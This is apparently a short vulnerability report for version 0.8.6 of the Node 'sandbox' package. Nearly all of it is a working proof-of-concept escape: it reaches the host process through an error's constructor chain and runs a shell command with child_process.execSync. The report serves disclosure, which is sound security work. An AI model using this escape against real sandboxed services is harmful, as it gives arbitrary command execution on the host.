Open
Description
- Sandbox version: 0.8.6
- Node version: 18.15.0
```js
var Sandbox = require("sandbox");

// Code handed to the sandbox as a string
var code = `
try {
  propertyIsEnumerable.call(undefined,);
} catch (pp) {
  pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`;

var s = new Sandbox();
s.run(code);
```
The sandbox can be escaped by calling the `propertyIsEnumerable.call` function.
Also, we can execute arbitrary shell code using the `process` module.